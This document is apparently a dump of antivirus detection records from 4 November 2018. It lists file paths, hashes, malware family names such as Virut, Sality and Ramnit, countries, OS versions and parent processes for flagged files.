  Row(detection=Row(filename='setup (11).exe', filepath='C:\\Users\\X\\Downloads\\Setup (11).exe', filesize=460000, name='PUA/DomaIQ.Gen.#M300.#R5434'), hash='e75c7c9b535c57aed80938af4cc1082d470317b4181fffa50c276b086c641346', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T18:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='beee8bcfa0ace7a2948bd2903d990afd.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_2066938746\\beee8bcfa0ace7a2948bd2903d990afd.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='e7c0ceb9ca1ffeb43646feef0b15f524b78928310015fcfdd8b227e8bfef466d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T18:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vpnoriginal1.exe', filepath='c:\\users\\X\\desktop\\work\\humanscale\\kosten\\reisekosten\\vpnoriginal1.exe', filesize=192000, name='SPR/QuickBatch.Gen.#M1.#R1'), hash='e832deb5d195c3a16f542d75927c957b48f75205146e7c24735331d11e9bdda6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T00:37:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T07:37:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T02:37:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T01:37:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T03:37:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T05:37:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T08:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T06:37:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T04:37:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E8E4707CA2468B241A727B7EA430220663115263E6CB3F2A60AF723B6B174073', filesize=1408000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:56:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='image4797.jpg', filepath='C:\\Users\\X\\Pictures\\image4797.JPG', filesize=3072000, name='DR/FakePic.Gen.#M1.#R1'), hash='e9af3173d17795b2180715eaf021aaa9ea7f846b6c7070e2d68cf633b4ec2bb5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:23:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enviacargaredecard.exe', filepath='C:\\Users\\X\\Desktop\\FINANCEIRO\\Pastas Diversas\\Backup SiTef\\2016-04-01-SiTef\\APLIC.WIN\\enviacargaredecard.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='e9edf33dfd617ac9a998b1dc917665dc643a5d140b17963a04f08a50b7d41ec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:52:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='e:\\autocadler\\autocad2007\\bin\\acadfeui\\program files\\common files\\microsoft shared\\vba\\vba6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='ea27d097eb2acac01fab9bdf67305c38049ee09e9abc7d17d09a3282e4d00742', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\coreldraw13\\program files\\common files\\microsoft shared\\vba\\vba6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='ea27d097eb2acac01fab9bdf67305c38049ee09e9abc7d17d09a3282e4d00742', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsqEFB1.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:27:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfDC08.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:32:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfECB0.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:00:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192131-366ce03f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_928360b4\\AVSCAN-20181104-192049-32960277\\AVSCAN-20181104-192131-366CE03F', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsr5B54.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsr5B54.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nscA467.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Total Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-04T09:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nseDCBB.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T14:15:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EA813CD4129DF283F7AE7BC890FD650FC1D876E20BE0E460ABA3EAC62A93EFC0', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:39:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsvA96A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T12:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-04T23:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-04T19:48:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EB60460FBC534F7854A7B0B6C43560B1557EF302FDD6234DF3CB48ED855B80A6', filesize=768000, name='PUA/SoftPulse.aone.#M1.#R1'), hash='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:00:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EB6B3866A857C6A18D3028DDA018818690E0696C082F079E80DE4C81343BBB55', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00004c6c', filepath='C:\\Windows\\Temp\\tmp00007bad\\tmp00004c6c', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='ebca7c22926757c18e4cef1fe92b5c582526d4057456c41f1e4298a511645a74', metadata=Row(cmdline='-k bdx -s scan', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T18:59:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FileSplitterJoiner.exe', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215827-8aeca388', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215827-8AECA388', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:58:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2b1cbb358b96971b91ba31271f3b8474c336160d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2b1cbb358b96971b91ba31271f3b8474c336160d', filesize=2112000, name='HEUR/AGEN.1027091.#M1.#R1'), hash='ecb42e734b7897abde09fa4036fa425eecb3e972282db06123abe26741275ccd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:15:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2b1cbb358b96971b91ba31271f3b8474c336160d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2b1cbb358b96971b91ba31271f3b8474c336160d', filesize=2112000, name='HEUR/AGEN.1027112.#M1.#R1'), hash='ecb42e734b7897abde09fa4036fa425eecb3e972282db06123abe26741275ccd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:12:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\ED6657BB0D0BDFE64632DDBC923BAA2583872FD76EF291CC757019A27F0901B4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:51:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.7\\圖檔總目錄\\備用\\CAD\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='ed9c7ab34a3206cd92f9364af4984b5b4c424d4dd432e3d05b1101a5c1e7e8e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\Cobian.exe', parentsize=720896, timestamp='2018-11-04T16:02:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093651-149dacd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7b4870a\\AVSCAN-20181104-093636-11E94D4E\\AVSCAN-20181104-093651-149DACD0', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:38:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c5be27f1-d668-8543-40e5-5f099e5597fb.exe', filepath='H:\\{c4660af2-ce72-7ee5-10f7-7509699c4809}\\c5be27f1-d668-8543-40e5-5f099e5597fb.exe', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T07:37:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:53:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:19:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EF69213B2D755D59D820A3C7C539266025891CFB66702206D50067E0BA4723D6', filesize=768000, name='HEUR/AGEN.1024045.#M1.#R1'), hash='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:43:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jre-6u6-.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\SINSIN\\SINTA\\MOZILLAF\\JRE-6U6-.EXE', filesize=16000000, name='W32/Sality.#M1.#R1'), hash='efcb561f4f92f9b62b1f5bd49a5a59d301f5e1c8596f41e84b88216be80d1f6a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:06:45Z'), dt=datetime.date(2018, 11, 4)),
